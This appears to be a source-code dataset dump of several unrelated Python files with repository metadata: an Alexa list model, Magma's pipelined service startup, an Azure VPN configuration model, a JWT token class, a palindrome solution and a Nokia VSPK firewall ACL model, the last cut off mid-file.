] | null | null | null |
ask-sdk-model/ask_sdk_model/services/list_management/alexa_list.py
|
Signal-Kinetics/alexa-apis-for-python
|
abb8d3dce18a5510c48b215406ed36c024f01495
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
#
# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file
# except in compliance with the License. A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for
# the specific language governing permissions and limitations under the License.
#
import pprint
import re # noqa: F401
import six
import typing
from enum import Enum
if typing.TYPE_CHECKING:
from typing import Dict, List, Optional, Union
from datetime import datetime
from ask_sdk_model.services.list_management.alexa_list_item import AlexaListItem
from ask_sdk_model.services.list_management.list_state import ListState
from ask_sdk_model.services.list_management.links import Links
class AlexaList(object):
"""
:param list_id:
:type list_id: (optional) str
:param name:
:type name: (optional) str
:param state:
:type state: (optional) ask_sdk_model.services.list_management.list_state.ListState
:param version:
:type version: (optional) int
:param items:
:type items: (optional) list[ask_sdk_model.services.list_management.alexa_list_item.AlexaListItem]
:param links:
:type links: (optional) ask_sdk_model.services.list_management.links.Links
"""
deserialized_types = {
'list_id': 'str',
'name': 'str',
'state': 'ask_sdk_model.services.list_management.list_state.ListState',
'version': 'int',
'items': 'list[ask_sdk_model.services.list_management.alexa_list_item.AlexaListItem]',
'links': 'ask_sdk_model.services.list_management.links.Links'
} # type: Dict
attribute_map = {
'list_id': 'listId',
'name': 'name',
'state': 'state',
'version': 'version',
'items': 'items',
'links': 'links'
} # type: Dict
supports_multiple_types = False
def __init__(self, list_id=None, name=None, state=None, version=None, items=None, links=None):
# type: (Optional[str], Optional[str], Optional[ListState], Optional[int], Optional[List[AlexaListItem]], Optional[Links]) -> None
"""
:param list_id:
:type list_id: (optional) str
:param name:
:type name: (optional) str
:param state:
:type state: (optional) ask_sdk_model.services.list_management.list_state.ListState
:param version:
:type version: (optional) int
:param items:
:type items: (optional) list[ask_sdk_model.services.list_management.alexa_list_item.AlexaListItem]
:param links:
:type links: (optional) ask_sdk_model.services.list_management.links.Links
"""
self.__discriminator_value = None # type: str
self.list_id = list_id
self.name = name
self.state = state
self.version = version
self.items = items
self.links = links
def to_dict(self):
# type: () -> Dict[str, object]
"""Returns the model properties as a dict"""
result = {} # type: Dict
for attr, _ in six.iteritems(self.deserialized_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else
x.value if isinstance(x, Enum) else x,
value
))
elif isinstance(value, Enum):
result[attr] = value.value
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else
(item[0], item[1].value)
if isinstance(item[1], Enum) else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
# type: () -> str
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
# type: () -> str
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
# type: (object) -> bool
"""Returns true if both objects are equal"""
if not isinstance(other, AlexaList):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
# type: (object) -> bool
"""Returns true if both objects are not equal"""
return not self == other
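A quick sketch of how `to_dict` flattens the model. Note it keys the result by the Python attribute names from `deserialized_types`, not the wire names in `attribute_map` (values below are illustrative):

```python
alexa_list = AlexaList(list_id='listId123', name='Shopping', version=1)
print(alexa_list.to_dict())
# {'list_id': 'listId123', 'name': 'Shopping', 'state': None,
#  'version': 1, 'items': None, 'links': None}
```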
| 34.137931
| 138
| 0.609293
|
import pprint
import re
import six
import typing
from enum import Enum
if typing.TYPE_CHECKING:
from typing import Dict, List, Optional, Union
from datetime import datetime
from ask_sdk_model.services.list_management.alexa_list_item import AlexaListItem
from ask_sdk_model.services.list_management.list_state import ListState
from ask_sdk_model.services.list_management.links import Links
class AlexaList(object):
deserialized_types = {
'list_id': 'str',
'name': 'str',
'state': 'ask_sdk_model.services.list_management.list_state.ListState',
'version': 'int',
'items': 'list[ask_sdk_model.services.list_management.alexa_list_item.AlexaListItem]',
'links': 'ask_sdk_model.services.list_management.links.Links'
}
attribute_map = {
'list_id': 'listId',
'name': 'name',
'state': 'state',
'version': 'version',
'items': 'items',
'links': 'links'
    }
    supports_multiple_types = False
def __init__(self, list_id=None, name=None, state=None, version=None, items=None, links=None):
self.__discriminator_value = None
self.list_id = list_id
self.name = name
self.state = state
self.version = version
self.items = items
self.links = links
def to_dict(self):
result = {}
for attr, _ in six.iteritems(self.deserialized_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else
x.value if isinstance(x, Enum) else x,
value
))
elif isinstance(value, Enum):
result[attr] = value.value
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else
(item[0], item[1].value)
if isinstance(item[1], Enum) else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
return pprint.pformat(self.to_dict())
def __repr__(self):
return self.to_str()
def __eq__(self, other):
if not isinstance(other, AlexaList):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
| true
| true
|
1c493d04d827f7eee6049ec2ce025df8bc70b4f9
| 7,100
|
py
|
Python
|
lte/gateway/python/magma/pipelined/main.py
|
ashish-acl/magma
|
d938f420b56b867a7c64101e6fac63f50be58a46
|
[
"BSD-3-Clause"
] | null | null | null |
lte/gateway/python/magma/pipelined/main.py
|
ashish-acl/magma
|
d938f420b56b867a7c64101e6fac63f50be58a46
|
[
"BSD-3-Clause"
] | 151
|
2020-09-03T20:44:13.000Z
|
2022-03-31T20:28:52.000Z
|
lte/gateway/python/magma/pipelined/main.py
|
ashish-acl/magma
|
d938f420b56b867a7c64101e6fac63f50be58a46
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python3
"""
Copyright 2020 The Magma Authors.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree.
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# pylint: skip-file
# pylint does not play well with aioeventlet, as it uses asyncio.async which
# produces a parse error
import asyncio
import logging
import threading
import aioeventlet
from ryu import cfg
from ryu.base.app_manager import AppManager
from scapy.arch import get_if_hwaddr
from ryu.ofproto.ofproto_v1_4 import OFPP_LOCAL
from magma.common.misc_utils import call_process, get_ip_from_if
from magma.common.sentry import sentry_init
from magma.common.service import MagmaService
from magma.configuration import environment
from magma.pipelined.app import of_rest_server
from magma.pipelined.check_quota_server import run_flask
from magma.pipelined.service_manager import ServiceManager
from magma.pipelined.ifaces import monitor_ifaces
from magma.pipelined.rpc_servicer import PipelinedRpcServicer
from magma.pipelined.gtp_stats_collector import GTPStatsCollector, \
MIN_OVSDB_DUMP_POLLING_INTERVAL
from magma.pipelined.app.he import PROXY_PORT_NAME
from magma.pipelined.bridge_util import BridgeTools
from lte.protos.mconfig import mconfigs_pb2
def main():
"""
Loads the Ryu apps we want to run from the config file.
This should exit on keyboard interrupt.
"""
# Run asyncio loop in a greenthread so we can evaluate other eventlets
# TODO: Remove once Ryu migrates to asyncio
asyncio.set_event_loop_policy(aioeventlet.EventLoopPolicy())
service = MagmaService('pipelined', mconfigs_pb2.PipelineD())
# Optionally pipe errors to Sentry
sentry_init()
service_config = service.config
if environment.is_dev_mode():
of_rest_server.configure(service_config)
# Set Ryu config params
cfg.CONF.ofp_listen_host = "127.0.0.1"
# override mconfig using local config.
# TODO: move config compilation to separate module.
enable_nat = service.config.get('enable_nat', service.mconfig.nat_enabled)
service.config['enable_nat'] = enable_nat
logging.info("Nat: %s", enable_nat)
vlan_tag = service.config.get('sgi_management_iface_vlan',
service.mconfig.sgi_management_iface_vlan)
service.config['sgi_management_iface_vlan'] = vlan_tag
sgi_ip = service.config.get('sgi_management_iface_ip_addr',
service.mconfig.sgi_management_iface_ip_addr)
service.config['sgi_management_iface_ip_addr'] = sgi_ip
sgi_gateway_ip = service.config.get('sgi_management_iface_gw',
service.mconfig.sgi_management_iface_gw)
service.config['sgi_management_iface_gw'] = sgi_gateway_ip
if 'virtual_mac' not in service.config:
service.config['virtual_mac'] = get_if_hwaddr(service.config.get('bridge_name'))
# this is not read from yml file.
service.config['uplink_port'] = OFPP_LOCAL
uplink_port_name = service.config.get('ovs_uplink_port_name', None)
if enable_nat is False and uplink_port_name is not None:
service.config['uplink_port'] = BridgeTools.get_ofport(uplink_port_name)
# header enrichment related configuration.
service.config['proxy_port_name'] = PROXY_PORT_NAME
he_enabled_flag = False
if service.mconfig.he_config:
he_enabled_flag = service.mconfig.he_config.enable_header_enrichment
he_enabled = service.config.get('he_enabled', he_enabled_flag)
service.config['he_enabled'] = he_enabled
# monitoring related configuration
mtr_interface = service.config.get('mtr_interface', None)
if mtr_interface:
mtr_ip = get_ip_from_if(mtr_interface)
service.config['mtr_ip'] = mtr_ip
# Load the ryu apps
service_manager = ServiceManager(service)
service_manager.load()
def callback(returncode):
if returncode != 0:
logging.error(
"Failed to set MASQUERADE: %d", returncode
)
# TODO fix this hack for XWF
if enable_nat is True or service.config.get('setup_type') == 'XWF':
call_process('iptables -t nat -A POSTROUTING -o %s -j MASQUERADE'
% service.config['nat_iface'],
callback,
service.loop
)
service.loop.create_task(monitor_ifaces(
service.config['monitored_ifaces'],
service.loop),
)
manager = AppManager.get_instance()
# Add pipelined rpc servicer
pipelined_srv = PipelinedRpcServicer(
service.loop,
manager.applications.get('GYController', None),
manager.applications.get('EnforcementController', None),
manager.applications.get('EnforcementStatsController', None),
manager.applications.get('DPIController', None),
manager.applications.get('UEMacAddressController', None),
manager.applications.get('CheckQuotaController', None),
manager.applications.get('IPFIXController', None),
manager.applications.get('VlanLearnController', None),
manager.applications.get('TunnelLearnController', None),
manager.applications.get('Classifier', None),
manager.applications.get('InOutController', None),
manager.applications.get('NGServiceController', None),
service.config,
service_manager)
pipelined_srv.add_to_server(service.rpc_server)
if service.config['setup_type'] == 'CWF':
bridge_ip = service.config['bridge_ip_address']
has_quota_port = service.config['has_quota_port']
no_quota_port = service.config['no_quota_port']
def on_exit_server_thread():
service.StopService(None, None)
# For CWF start quota check servers
start_check_quota_server(run_flask, bridge_ip, has_quota_port, True,
on_exit_server_thread)
start_check_quota_server(run_flask, bridge_ip, no_quota_port, False,
on_exit_server_thread)
if service.config['setup_type'] == 'LTE':
polling_interval = service.config.get('ovs_gtp_stats_polling_interval',
MIN_OVSDB_DUMP_POLLING_INTERVAL)
collector = GTPStatsCollector(
polling_interval,
service.loop)
collector.start()
# Run the service loop
service.run()
# Cleanup the service
service.close()
def start_check_quota_server(target, ip, port, response, exit_callback):
""" Starts service server threads """
thread = threading.Thread(
target=target,
args=(ip, port, response, exit_callback))
thread.daemon = True
thread.start()
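# --- Editor's illustrative sketch (not part of the original file) ---
# The daemon-thread pattern used by start_check_quota_server(), shown with a
# hypothetical stand-in for run_flask so it is self-contained:
def _demo_daemon_server():
    def _fake_quota_server(ip, port, response, exit_callback):
        print('serving on {}:{} with fixed quota response {}'.format(ip, port, response))
    t = threading.Thread(target=_fake_quota_server,
                         args=('127.0.0.1', 8080, True, lambda *a: None))
    t.daemon = True  # daemon thread: it will not block process shutdown
    t.start()
    t.join(timeout=1.0)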
if __name__ == "__main__":
main()
| 37.172775
| 88
| 0.705775
|
import asyncio
import logging
import threading
import aioeventlet
from ryu import cfg
from ryu.base.app_manager import AppManager
from scapy.arch import get_if_hwaddr
from ryu.ofproto.ofproto_v1_4 import OFPP_LOCAL
from magma.common.misc_utils import call_process, get_ip_from_if
from magma.common.sentry import sentry_init
from magma.common.service import MagmaService
from magma.configuration import environment
from magma.pipelined.app import of_rest_server
from magma.pipelined.check_quota_server import run_flask
from magma.pipelined.service_manager import ServiceManager
from magma.pipelined.ifaces import monitor_ifaces
from magma.pipelined.rpc_servicer import PipelinedRpcServicer
from magma.pipelined.gtp_stats_collector import GTPStatsCollector, \
MIN_OVSDB_DUMP_POLLING_INTERVAL
from magma.pipelined.app.he import PROXY_PORT_NAME
from magma.pipelined.bridge_util import BridgeTools
from lte.protos.mconfig import mconfigs_pb2
def main():
asyncio.set_event_loop_policy(aioeventlet.EventLoopPolicy())
service = MagmaService('pipelined', mconfigs_pb2.PipelineD())
sentry_init()
service_config = service.config
if environment.is_dev_mode():
of_rest_server.configure(service_config)
cfg.CONF.ofp_listen_host = "127.0.0.1"
enable_nat = service.config.get('enable_nat', service.mconfig.nat_enabled)
service.config['enable_nat'] = enable_nat
logging.info("Nat: %s", enable_nat)
vlan_tag = service.config.get('sgi_management_iface_vlan',
service.mconfig.sgi_management_iface_vlan)
service.config['sgi_management_iface_vlan'] = vlan_tag
sgi_ip = service.config.get('sgi_management_iface_ip_addr',
service.mconfig.sgi_management_iface_ip_addr)
service.config['sgi_management_iface_ip_addr'] = sgi_ip
sgi_gateway_ip = service.config.get('sgi_management_iface_gw',
service.mconfig.sgi_management_iface_gw)
service.config['sgi_management_iface_gw'] = sgi_gateway_ip
if 'virtual_mac' not in service.config:
service.config['virtual_mac'] = get_if_hwaddr(service.config.get('bridge_name'))
service.config['uplink_port'] = OFPP_LOCAL
uplink_port_name = service.config.get('ovs_uplink_port_name', None)
if enable_nat is False and uplink_port_name is not None:
service.config['uplink_port'] = BridgeTools.get_ofport(uplink_port_name)
service.config['proxy_port_name'] = PROXY_PORT_NAME
he_enabled_flag = False
if service.mconfig.he_config:
he_enabled_flag = service.mconfig.he_config.enable_header_enrichment
he_enabled = service.config.get('he_enabled', he_enabled_flag)
service.config['he_enabled'] = he_enabled
mtr_interface = service.config.get('mtr_interface', None)
if mtr_interface:
mtr_ip = get_ip_from_if(mtr_interface)
service.config['mtr_ip'] = mtr_ip
service_manager = ServiceManager(service)
service_manager.load()
def callback(returncode):
if returncode != 0:
logging.error(
"Failed to set MASQUERADE: %d", returncode
)
if enable_nat is True or service.config.get('setup_type') == 'XWF':
call_process('iptables -t nat -A POSTROUTING -o %s -j MASQUERADE'
% service.config['nat_iface'],
callback,
service.loop
)
service.loop.create_task(monitor_ifaces(
service.config['monitored_ifaces'],
service.loop),
)
manager = AppManager.get_instance()
pipelined_srv = PipelinedRpcServicer(
service.loop,
manager.applications.get('GYController', None),
manager.applications.get('EnforcementController', None),
manager.applications.get('EnforcementStatsController', None),
manager.applications.get('DPIController', None),
manager.applications.get('UEMacAddressController', None),
manager.applications.get('CheckQuotaController', None),
manager.applications.get('IPFIXController', None),
manager.applications.get('VlanLearnController', None),
manager.applications.get('TunnelLearnController', None),
manager.applications.get('Classifier', None),
manager.applications.get('InOutController', None),
manager.applications.get('NGServiceController', None),
service.config,
service_manager)
pipelined_srv.add_to_server(service.rpc_server)
if service.config['setup_type'] == 'CWF':
bridge_ip = service.config['bridge_ip_address']
has_quota_port = service.config['has_quota_port']
no_quota_port = service.config['no_quota_port']
def on_exit_server_thread():
service.StopService(None, None)
start_check_quota_server(run_flask, bridge_ip, has_quota_port, True,
on_exit_server_thread)
start_check_quota_server(run_flask, bridge_ip, no_quota_port, False,
on_exit_server_thread)
if service.config['setup_type'] == 'LTE':
polling_interval = service.config.get('ovs_gtp_stats_polling_interval',
MIN_OVSDB_DUMP_POLLING_INTERVAL)
collector = GTPStatsCollector(
polling_interval,
service.loop)
collector.start()
service.run()
service.close()
def start_check_quota_server(target, ip, port, response, exit_callback):
thread = threading.Thread(
target=target,
args=(ip, port, response, exit_callback))
thread.daemon = True
thread.start()
if __name__ == "__main__":
main()
| true
| true
|
1c493e1bf2ed370836c63e29a5f7c2abab7be087
| 1,982
|
py
|
Python
|
azure/mgmt/network/v2016_09_01/models/vpn_client_configuration.py
|
EnjoyLifeFund/Debian_py36_packages
|
1985d4c73fabd5f08f54b922e73a9306e09c77a5
|
[
"BSD-3-Clause",
"BSD-2-Clause",
"MIT"
] | 1
|
2022-01-25T22:52:58.000Z
|
2022-01-25T22:52:58.000Z
|
azure/mgmt/network/v2016_09_01/models/vpn_client_configuration.py
|
EnjoyLifeFund/Debian_py36_packages
|
1985d4c73fabd5f08f54b922e73a9306e09c77a5
|
[
"BSD-3-Clause",
"BSD-2-Clause",
"MIT"
] | null | null | null |
azure/mgmt/network/v2016_09_01/models/vpn_client_configuration.py
|
EnjoyLifeFund/Debian_py36_packages
|
1985d4c73fabd5f08f54b922e73a9306e09c77a5
|
[
"BSD-3-Clause",
"BSD-2-Clause",
"MIT"
] | null | null | null |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class VpnClientConfiguration(Model):
"""VpnClientConfiguration for P2S client.
:param vpn_client_address_pool: The reference of the address space
resource which represents Address space for P2S VpnClient.
:type vpn_client_address_pool:
~azure.mgmt.network.v2016_09_01.models.AddressSpace
:param vpn_client_root_certificates: VpnClientRootCertificate for virtual
network gateway.
:type vpn_client_root_certificates:
list[~azure.mgmt.network.v2016_09_01.models.VpnClientRootCertificate]
:param vpn_client_revoked_certificates: VpnClientRevokedCertificate for
Virtual network gateway.
:type vpn_client_revoked_certificates:
list[~azure.mgmt.network.v2016_09_01.models.VpnClientRevokedCertificate]
"""
_attribute_map = {
'vpn_client_address_pool': {'key': 'vpnClientAddressPool', 'type': 'AddressSpace'},
'vpn_client_root_certificates': {'key': 'vpnClientRootCertificates', 'type': '[VpnClientRootCertificate]'},
'vpn_client_revoked_certificates': {'key': 'vpnClientRevokedCertificates', 'type': '[VpnClientRevokedCertificate]'},
}
def __init__(self, vpn_client_address_pool=None, vpn_client_root_certificates=None, vpn_client_revoked_certificates=None):
self.vpn_client_address_pool = vpn_client_address_pool
self.vpn_client_root_certificates = vpn_client_root_certificates
self.vpn_client_revoked_certificates = vpn_client_revoked_certificates
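# --- Editor's illustrative sketch (not part of the original file) ---
# Minimal construction example; AddressSpace and VpnClientRootCertificate are
# assumed to come from the same generated models package, and the address
# prefix and certificate payload below are made up:
def _demo_vpn_client_configuration():
    from azure.mgmt.network.v2016_09_01.models import AddressSpace, VpnClientRootCertificate
    return VpnClientConfiguration(
        vpn_client_address_pool=AddressSpace(address_prefixes=['172.16.201.0/24']),
        vpn_client_root_certificates=[
            VpnClientRootCertificate(public_cert_data='...base64 DER...')])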
| 47.190476
| 126
| 0.717962
|
from msrest.serialization import Model
class VpnClientConfiguration(Model):
_attribute_map = {
'vpn_client_address_pool': {'key': 'vpnClientAddressPool', 'type': 'AddressSpace'},
'vpn_client_root_certificates': {'key': 'vpnClientRootCertificates', 'type': '[VpnClientRootCertificate]'},
'vpn_client_revoked_certificates': {'key': 'vpnClientRevokedCertificates', 'type': '[VpnClientRevokedCertificate]'},
}
def __init__(self, vpn_client_address_pool=None, vpn_client_root_certificates=None, vpn_client_revoked_certificates=None):
self.vpn_client_address_pool = vpn_client_address_pool
self.vpn_client_root_certificates = vpn_client_root_certificates
self.vpn_client_revoked_certificates = vpn_client_revoked_certificates
| true
| true
|
1c493e8807b0e5346571eaaacbb826cbf365e77c
| 565
|
py
|
Python
|
tracker/user.py
|
k4t0mono/bridge-chat
|
49f70e270002b1cb91363b2a0b3acce2a56fee16
|
[
"BSD-2-Clause"
] | null | null | null |
tracker/user.py
|
k4t0mono/bridge-chat
|
49f70e270002b1cb91363b2a0b3acce2a56fee16
|
[
"BSD-2-Clause"
] | null | null | null |
tracker/user.py
|
k4t0mono/bridge-chat
|
49f70e270002b1cb91363b2a0b3acce2a56fee16
|
[
"BSD-2-Clause"
] | null | null | null |
import jwt
import time
import os
class User():
def __init__(self, login):
self.login = login
self.tokens = []
def gen_token(self):
        end = int(time.time()) + 86400  # token valid for 24 hours
d = { 'login': self.login, 'type': 'auth', 'time': end }
t = jwt.encode(d, os.environ['BRIDGECHAT_SECRET'], algorithm='HS512')
        if isinstance(t, bytes):  # PyJWT < 2.0 returns bytes; >= 2.0 returns str
            t = t.decode('utf-8')
self.tokens.append(t)
return t
def __repr__(self):
s = '<User login=\'{}\' tokens={}>'.format(self.login, len(self.tokens))
return s
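# --- Editor's illustrative sketch (not part of the original file) ---
# Verifying a token produced by gen_token(), assuming the PyJWT API; the
# algorithm must be pinned to HS512 when decoding:
def _demo_verify(token):
    payload = jwt.decode(token, os.environ['BRIDGECHAT_SECRET'], algorithms=['HS512'])
    return payload['type'] == 'auth' and payload['time'] > int(time.time())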
| 23.541667
| 80
| 0.534513
|
import jwt
import time
import os
class User():
def __init__(self, login):
self.login = login
self.tokens = []
def gen_token(self):
        end = int(time.time()) + 86400
d = { 'login': self.login, 'type': 'auth', 'time': end }
t = jwt.encode(d, os.environ['BRIDGECHAT_SECRET'], algorithm='HS512')
        if isinstance(t, bytes):
            t = t.decode('utf-8')
self.tokens.append(t)
return t
def __repr__(self):
s = '<User login=\'{}\' tokens={}>'.format(self.login, len(self.tokens))
return s
| true
| true
|
1c493e966b7d54c69854c811b65ceb355625b0b4
| 347
|
py
|
Python
|
Python3/0009-Palindrome-Number/soln.py
|
wyaadarsh/LeetCode-Solutions
|
3719f5cb059eefd66b83eb8ae990652f4b7fd124
|
[
"MIT"
] | 5
|
2020-07-24T17:48:59.000Z
|
2020-12-21T05:56:00.000Z
|
Python3/0009-Palindrome-Number/soln.py
|
zhangyaqi1989/LeetCode-Solutions
|
2655a1ffc8678ad1de6c24295071308a18c5dc6e
|
[
"MIT"
] | null | null | null |
Python3/0009-Palindrome-Number/soln.py
|
zhangyaqi1989/LeetCode-Solutions
|
2655a1ffc8678ad1de6c24295071308a18c5dc6e
|
[
"MIT"
] | 2
|
2020-07-24T17:49:01.000Z
|
2020-08-31T19:57:35.000Z
|
class Solution:
def isPalindrome(self, x):
"""
:type x: int
:rtype: bool
"""
# solve it without converting the integer to a string
if x < 0:
return False
r = 0
origin = x
while x:
r = r * 10 + x % 10
x //= 10
return r == origin
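# --- Editor's illustrative sketch (not part of the original file) ---
# Quick checks of the digit-reversal approach; full reversal cannot overflow in
# Python, so no early-exit half-reversal is needed here:
def _demo_is_palindrome():
    s = Solution()
    assert s.isPalindrome(121) is True
    assert s.isPalindrome(-121) is False  # leading '-' makes it non-palindromic
    assert s.isPalindrome(10) is False    # reversed, 10 -> 1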
| 23.133333
| 61
| 0.420749
|
class Solution:
def isPalindrome(self, x):
if x < 0:
return False
r = 0
origin = x
while x:
r = r * 10 + x % 10
x //= 10
return r == origin
| true
| true
|
1c493ee7f94ba470d37424f4171f5c35c2ec9d91
| 15,082
|
py
|
Python
|
vspk/v6/nufirewallacl.py
|
axxyhtrx/vspk-python
|
4495882c6bcbb1ef51b14b9f4dc7efe46476ff50
|
[
"BSD-3-Clause"
] | 19
|
2016-03-07T12:34:22.000Z
|
2020-06-11T11:09:02.000Z
|
vspk/v6/nufirewallacl.py
|
axxyhtrx/vspk-python
|
4495882c6bcbb1ef51b14b9f4dc7efe46476ff50
|
[
"BSD-3-Clause"
] | 40
|
2016-06-13T15:36:54.000Z
|
2020-11-10T18:14:43.000Z
|
vspk/v6/nufirewallacl.py
|
axxyhtrx/vspk-python
|
4495882c6bcbb1ef51b14b9f4dc7efe46476ff50
|
[
"BSD-3-Clause"
] | 15
|
2016-06-10T22:06:01.000Z
|
2020-12-15T18:37:42.000Z
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2015, Alcatel-Lucent Inc, 2017 Nokia
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from .fetchers import NUPermissionsFetcher
from .fetchers import NUMetadatasFetcher
from .fetchers import NUFirewallRulesFetcher
from .fetchers import NUGlobalMetadatasFetcher
from .fetchers import NUDomainsFetcher
from bambou import NURESTObject
class NUFirewallAcl(NURESTObject):
""" Represents a FirewallAcl in the VSD
Notes:
None
"""
__rest_name__ = "firewallacl"
__resource_name__ = "firewallacls"
## Constants
CONST_ENTITY_SCOPE_GLOBAL = "GLOBAL"
CONST_ENTITY_SCOPE_ENTERPRISE = "ENTERPRISE"
def __init__(self, **kwargs):
""" Initializes a FirewallAcl instance
Notes:
You can specify all parameters while calling this methods.
A special argument named `data` will enable you to load the
object from a Python dictionary
Examples:
>>> firewallacl = NUFirewallAcl(id=u'xxxx-xxx-xxx-xxx', name=u'FirewallAcl')
>>> firewallacl = NUFirewallAcl(data=my_dict)
"""
super(NUFirewallAcl, self).__init__()
# Read/Write Attributes
self._name = None
self._last_updated_by = None
self._last_updated_date = None
self._active = None
self._default_allow_ip = None
self._default_allow_non_ip = None
self._description = None
self._embedded_metadata = None
self._entity_scope = None
self._creation_date = None
self._rule_ids = None
self._auto_generate_priority = None
self._owner = None
self._external_id = None
self.expose_attribute(local_name="name", remote_name="name", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="last_updated_by", remote_name="lastUpdatedBy", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="last_updated_date", remote_name="lastUpdatedDate", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="active", remote_name="active", attribute_type=bool, is_required=False, is_unique=False)
self.expose_attribute(local_name="default_allow_ip", remote_name="defaultAllowIP", attribute_type=bool, is_required=False, is_unique=False)
self.expose_attribute(local_name="default_allow_non_ip", remote_name="defaultAllowNonIP", attribute_type=bool, is_required=False, is_unique=False)
self.expose_attribute(local_name="description", remote_name="description", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="embedded_metadata", remote_name="embeddedMetadata", attribute_type=list, is_required=False, is_unique=False)
self.expose_attribute(local_name="entity_scope", remote_name="entityScope", attribute_type=str, is_required=False, is_unique=False, choices=[u'ENTERPRISE', u'GLOBAL'])
self.expose_attribute(local_name="creation_date", remote_name="creationDate", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="rule_ids", remote_name="ruleIds", attribute_type=list, is_required=False, is_unique=False)
self.expose_attribute(local_name="auto_generate_priority", remote_name="autoGeneratePriority", attribute_type=bool, is_required=False, is_unique=False)
self.expose_attribute(local_name="owner", remote_name="owner", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="external_id", remote_name="externalID", attribute_type=str, is_required=False, is_unique=True)
# Fetchers
self.permissions = NUPermissionsFetcher.fetcher_with_object(parent_object=self, relationship="child")
self.metadatas = NUMetadatasFetcher.fetcher_with_object(parent_object=self, relationship="child")
self.firewall_rules = NUFirewallRulesFetcher.fetcher_with_object(parent_object=self, relationship="child")
self.global_metadatas = NUGlobalMetadatasFetcher.fetcher_with_object(parent_object=self, relationship="child")
self.domains = NUDomainsFetcher.fetcher_with_object(parent_object=self, relationship="child")
self._compute_args(**kwargs)
# Properties
@property
def name(self):
""" Get name value.
Notes:
The name of the entity
"""
return self._name
@name.setter
def name(self, value):
""" Set name value.
Notes:
The name of the entity
"""
self._name = value
@property
def last_updated_by(self):
""" Get last_updated_by value.
Notes:
ID of the user who last updated the object.
This attribute is named `lastUpdatedBy` in VSD API.
"""
return self._last_updated_by
@last_updated_by.setter
def last_updated_by(self, value):
""" Set last_updated_by value.
Notes:
ID of the user who last updated the object.
This attribute is named `lastUpdatedBy` in VSD API.
"""
self._last_updated_by = value
@property
def last_updated_date(self):
""" Get last_updated_date value.
Notes:
Time stamp when this object was last updated.
This attribute is named `lastUpdatedDate` in VSD API.
"""
return self._last_updated_date
@last_updated_date.setter
def last_updated_date(self, value):
""" Set last_updated_date value.
Notes:
Time stamp when this object was last updated.
This attribute is named `lastUpdatedDate` in VSD API.
"""
self._last_updated_date = value
@property
def active(self):
""" Get active value.
Notes:
If enabled, it means that this ACL or QOS entry is active
"""
return self._active
@active.setter
def active(self, value):
""" Set active value.
Notes:
If enabled, it means that this ACL or QOS entry is active
"""
self._active = value
@property
def default_allow_ip(self):
""" Get default_allow_ip value.
Notes:
